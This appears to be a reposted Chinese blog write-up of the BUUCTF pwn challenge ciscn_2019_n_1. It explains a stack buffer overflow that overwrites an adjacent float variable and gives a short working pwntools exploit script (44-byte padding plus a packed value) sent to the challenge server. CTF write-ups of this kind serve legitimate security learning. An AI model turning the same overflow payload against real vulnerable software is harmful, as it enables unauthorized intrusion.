首页 > 其他分享 >buuctf.pwn.ciscn_2019_n_1

buuctf.pwn.ciscn_2019_n_1

时间:2023-03-23 12:35:53浏览次数:42  
标签:buuctf num1 num2 44 rbp 2019 pwn payload 字节

检测

开启了栈不可执行的检测
然后拖进IDA分析

比较赤裸
注意到,我们输入的是num1,但是比较的是num2
所以我们需要把num1溢出到num2
比较幸运的是,num1在num2的上方(空间角度)
所以我们可以把num1向下溢出到num2

  char num1[44]; // [rsp+0h] [rbp-30h] BYREF
  float num2; // [rsp+2Ch] [rbp-4h]

num1在rbp-0x30
num2在rbp-0x4
2者间距是44字节
我们需要覆盖num1,44字节,
然后再写入4字节 (ps:flaot是4字节,如果你要写入8字节,好像也没有影响)
点击

对应的16进制 dd 41348000h

于是我们的payload

payload = b'a' * (44) + p32(0x41348000)
from pwn import*

p=remote('node4.buuoj.cn',26598)
payload=b'A'*44+p32(0x41348000)
p.sendline(payload)
p.interactive()  

标签:buuctf,num1,num2,44,rbp,2019,pwn,payload,字节
From: https://www.cnblogs.com/re4mile/p/17247005.html

相关文章

  • 2019云栖大会精品资料免费下载
    场景杭州云栖大会前身为阿里云开发者大会,是中国最早的开发者创新展示平台。过去10年间,伴随互联网和云计算的蓬勃发展,大会规模逐年扩大。2018年云栖大会吸引了来自81个国家及......
  • BUUCTF-MISC-菜刀666
    下载得到一个流量包根据题目菜刀666,与菜刀有关,一般都是post连接,于是我们过滤post数据http.request.method==POST在tcp.streameq7中发现了大量数据右键追踪TCP流,看......
  • 2019杭电多校赛第一场Vacation
    Vacation题意:n辆车排队过路口,每辆车给定最大车速、车长、车头到路口的距离,求最后一辆车的最短通过时间分析:确定每辆车通过路口需要的总路程sum[i],然后分情况讨论:......
  • CVE-2019-1256漏洞分析
    0x00漏洞信息漏洞影响:本地提权漏洞文件:win32kfull.sys漏洞函数:GreGradientFill漏洞原因:空指针引用分析系统:Windows1903【漏洞分析合集】0x01漏洞分析崩溃时的堆栈......
  • debian ipxe-qemu (version 1.0.0+git-20190125.36a4c85-5 bug and install kvm+qemu+
    环境debiansid/testingbug1我发现了在sid中的一个BUG,并在debianwiki中找到了这个BUG的记录BUG2以上我们得知了,这个重要BUG不影响我们本身,所以直接安装安装可以只安装QEMU......
  • P5445 [APIO2019] 路灯 题解
    题目链接题目描述给你一个01串,有\(q\)个时刻,每个时刻要么把一位取反,要么问你在过去的所有时刻中有多少个时刻\(a\)和\(b-1\)之间都为1。题目分析观察题目,我们......
  • Origin 2019【科学数据分析】中文破解版安装包下载及图文安装教程​
    Origin是由OriginLab公司全新开发的一款科学绘图、数据分析软件,能够为用户提供多样的数据统计、数据处理、数据报告等功能,是全球商业行业、学术界和政府实验室超过50万科......
  • BUUCTF-MISC-面具下的flag()
    准备工作下载附件得到一个一张图片丢入winhex,发现还有一个flag.vmdk文件vmdk文件其实是虚拟机使用的硬盘文件打开kalibinwalk-emianju.jpg关键步骤这里如果在......
  • Vulnhub:pWnOS 2.0靶机
    kali:192.168.111.111靶机:192.168.111.235信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.235访问网站blog目录在源码处发现cms信息为:Si......
  • hitcon_ctf_2019_one_punch
    hitcon_ctf_2019_one_punch在2.29及以后得版本中对unsordedbin的进行了双向链表检查,故unsortedbinattack就不可以再用了,不过tcachestashingunlinkattack可以达到......